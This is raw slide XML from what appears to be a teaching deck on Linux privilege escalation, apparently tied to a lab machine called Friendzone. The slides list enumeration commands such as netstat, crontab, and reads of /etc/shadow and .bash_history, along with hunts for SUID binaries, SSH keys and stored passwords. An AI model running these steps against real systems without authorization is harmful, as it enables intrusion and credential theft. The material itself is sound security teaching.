                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>antulp</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ls -la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cron</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/crontab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pspy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C819A040-FF8E-4C2D-8FFC-62208F097D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="13543"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217921" y="1658274"/>
            <a:ext cx="5760020" cy="3726526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24BAF3EC-0BF2-401A-BBBD-617C4EA39CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918488" y="5364500"/>
            <a:ext cx="444039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All of these are common, no </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>privesc</a:t>
            </a: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 here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2113048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DFB96-2F62-4351-AB2F-46E2E0C7B7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7FCEE46-15EC-43C2-92EA-D6BEEF3401EB}"/>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22FC054D-9DEA-4170-BC4F-3F3D3D3209A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="970280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Primary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivEsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Path: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notable second: programs only accessible locally</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF634029-67DC-4672-873D-F3F52E55CE27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1793240" y="2435823"/>
            <a:ext cx="8605520" cy="3192912"/>
            <a:chOff x="2011680" y="2435823"/>
            <a:chExt cx="8605520" cy="3192912"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07E1FDF5-2170-42C8-9451-70094C94FEAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2238833" y="2535961"/>
              <a:ext cx="8263122" cy="1035334"/>
              <a:chOff x="2481971" y="5014912"/>
              <a:chExt cx="7248525" cy="908208"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Picture 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F00E8B9-0D38-474F-A455-639DC8722D20}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId2"/>
              <a:srcRect b="17087"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2481971" y="5014912"/>
                <a:ext cx="7248525" cy="908208"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0110FA67-C030-44F1-B5F6-9BFA8E7C3AB2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4036808" y="5151436"/>
                <a:ext cx="5544072"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9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6CB912-340D-47B5-8ACD-21CC842F3B51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect r="15632" b="39000"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2238833" y="3685964"/>
              <a:ext cx="8263122" cy="1828104"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D467D4B-DD8B-41FA-9F29-E81FCBF11950}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2320547" y="4244147"/>
              <a:ext cx="1305438" cy="432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11" name="Straight Connector 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B6126A-F14C-4F01-9C62-18C396C7E85F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3625985" y="2941337"/>
              <a:ext cx="3545366" cy="1391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343D056-A13A-4579-921B-6DB2459BD65D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2011680" y="2435823"/>
              <a:ext cx="8605520" cy="319291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3" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6ACE231-BCA3-4A68-A7F7-15FE353CC8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4306087" y="5570277"/>
            <a:ext cx="35798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FFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>pspy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> on Friendzone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15860691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40B2B3-2614-4997-BF4C-4E1EFB5B4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FA04D83-52D6-4F47-9750-72849D498F10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Am I Alone?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3BAE5F-25CF-4E1B-B219-AD03FF6EE5F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="5549581" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May need an intermediate step before root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Commands:</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/passwd</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/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(requires root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls -la /home/</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/group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat .../.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash_history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ls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t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{567DFB53-CB05-4346-B3FD-B3BB0B3DE6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5963920" y="1998299"/>
            <a:ext cx="6065777" cy="3221296"/>
            <a:chOff x="6026844" y="1990361"/>
            <a:chExt cx="6065777" cy="3221296"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F6DD2A0-E422-4FA2-A81E-937697B7B8FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6026844" y="1990361"/>
              <a:ext cx="5645032" cy="3060158"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ADC7238-8B24-4337-934C-91152989D5F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7152679" y="3366619"/>
              <a:ext cx="4939942" cy="1845038"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Straight Arrow Connector 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F769CC9-BC44-4D94-A372-34FE487B3AF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6614160" y="2924125"/>
              <a:ext cx="619760" cy="171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B970BF-17B3-4106-BA95-15B1EA0A762F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7233920" y="2695545"/>
              <a:ext cx="2682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anose="020B0604020202020204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Non-standard user</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Arrow Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48236B68-2ADB-4E9D-96C8-AA1998E8FD68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="30" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8790623" y="3923912"/>
              <a:ext cx="528576" cy="16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53CE33-079D-4408-8F5F-CE1553D90F75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9319199" y="3723857"/>
              <a:ext cx="27734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anose="020B0604020202020204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Potential step to root</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6066184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DBD59-9AB2-4FA3-8717-9AB8ADFB7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A341C55-EC0E-46BF-A91C-62C623252111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Am I Alone? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{257E932D-12C8-4434-9C83-3430735833F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivEsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passwords (check files, bash history)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83879580-2D19-4DF4-8533-27F0F52A9B42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="27320" b="32662"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075889" y="2882562"/>
            <a:ext cx="8040222" cy="2680038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99AED8B0-4B2D-4637-BFC6-F295A0E95A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4211192" y="5562600"/>
            <a:ext cx="37696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Ended up being a dead end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31289365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5E18B-FD01-4636-B84D-9C3356CA89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1FADDA0-3500-4E4B-9386-3B23ACDFBC78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ACBFAB1-66A2-43DA-822C-C8157D39B686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="4841240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the hard part</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Looking for uncommon and misconfigured items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At a high level:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for write permissions on system files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for SUID binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for writable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> jobs or files they operate on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for any uncommon software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for passwords/sensitive info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for security-poor configs (like SSH as root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119307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D1453A-A5FD-45A3-879E-19C8F0B3D389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="565966" y="1205766"/>
            <a:ext cx="11060068" cy="676369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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(5/6)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3582" y="2201729"/>
            <a:ext cx="6960497" cy="3706625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output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oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
